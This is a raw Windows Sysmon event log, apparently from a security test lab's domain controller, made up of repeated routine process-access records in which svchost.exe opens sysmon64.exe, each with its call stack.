13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 